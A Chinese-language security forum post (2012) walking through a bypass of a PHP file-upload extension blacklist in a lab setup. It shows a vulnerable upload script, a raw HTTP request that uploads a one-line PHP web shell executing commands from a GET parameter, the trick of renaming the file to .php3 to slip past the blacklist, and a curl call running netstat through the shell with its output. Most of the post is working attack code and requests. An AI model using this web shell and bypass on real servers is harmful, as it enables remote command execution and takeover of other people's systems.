切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
221 php文件上传 黑名单[复制链接]
发表于 2012-8-25 16:58:14 | 显示全部楼层 |!read_mode!
代码如下:

  1. root@ubuntu:/var/www# cat up4.php
  2. <?php
  3.    $blacklist = array(".php", ".phtml", ".php3", ".php4");
  4.    foreach ($blacklist as $item)
  5.     {
  6.          if(preg_match("/$item\$/i", $_FILES['userfile']['name']))
  7.        {
  8.               echo "We do not allow uploading PHP files\n";
  9.               exit;
  10.           }
  11.     }
  12.    $uploaddir = './';
  13.    $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
  14.    if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
  15.            echo "File is valid, and was successfully uploaded.\n";
  16.    }
  17.    else
  18.    {
  19.            echo "File uploading failed.\n";
  20.    }
  21. ?>

  22. root@ubuntu:/var/www# cat up4.html
  23. <form action="up4.php" method="POST" enctype="multipart/form-data">
  24. <input type="file" name="userfile">
  25. <input type="submit" value="submit" name="upload">
  26. </form>
  27. root@ubuntu:/var/www#
复制代码

禁止上传了这些 $blacklist = array(“.php”, “.phtml”);

数据表:


  1. POST /up4.php HTTP/1.1

  2. Host: 5.5.5.3

  3. User-Agent: Mozilla/5.0 (X11; Linux i686; rv:2.0) Gecko/20100101 Firefox/4.0

  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

  5. Accept-Language: en-us,en;q=0.5

  6. Accept-Encoding: gzip, deflate

  7. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

  8. Keep-Alive: 115

  9. Proxy-Connection: keep-alive

  10. Referer: http://5.5.5.3/up4.html

  11. Content-Type: multipart/form-data; boundary=---------------------------19008365551300823017511824359

  12. Content-Length: 378



  13. -----------------------------19008365551300823017511824359

  14. Content-Disposition: form-data; name="userfile"; filename="shell.php"

  15. Content-Type: application/x-php



  16. <?php system($_GET['cmd']); ?>


  17. -----------------------------19008365551300823017511824359

  18. Content-Disposition: form-data; name="upload"



  19. submit

  20. -----------------------------19008365551300823017511824359--
复制代码


Content-Disposition: form-data; name=”userfile”; filename=”shell.php” 修改后缀 这个需要根据系统特性

例如IIS解析 或者LINUX特性 Php PHP phH php5 等等 PHP4 PHP3等于
我改为


  1. Content-Disposition: form-data; name="userfile"; filename="1.php3"
复制代码

访问之

  1. root@Dis9Team:/pen/web# curl "http://5.5.5.3/1.php3?cmd=netstat -antp"
  2. Active Internet connections (w/o servers)
  3. Proto Recv-Q Send-Q Local Address           Foreign Address         State      
  4. tcp        0      0 5.5.5.3:www             5.5.5.2:58821           TIME_WAIT  
  5. tcp        0      0 5.5.5.3:ssh             5.5.5.2:36005           ESTABLISHED
  6. tcp        0      0 5.5.5.3:www             5.5.5.2:58824           ESTABLISHED
  7. tcp        0      0 5.5.5.3:www             5.5.5.2:58822           TIME_WAIT  
  8. Active UNIX domain sockets (w/o servers)
  9. Proto RefCnt Flags       Type       State         I-Node   Path
  10. unix  2      [ ]         DGRAM                    6270     @/org/kernel/udev/udevd
  11. unix  4      [ ]         DGRAM                    7061     /dev/log
  12. unix  2      [ ]         DGRAM                    8137     
  13. unix  2      [ ]         DGRAM                    8071     
  14. unix  3      [ ]         DGRAM                    6304     
  15. unix  3      [ ]         DGRAM                    6303     
  16. unix  3      [ ]         STREAM     CONNECTED     6263     @/com/ubuntu/upstart
  17. unix  3      [ ]         STREAM     CONNECTED     6262     
  18. unix  3      [ ]         STREAM     CONNECTED     6202     @/com/ubuntu/upstart
  19. unix  3      [ ]         STREAM     CONNECTED     6201     
  20. root@Dis9Team:/pen/web#
复制代码






操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-2 02:31

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部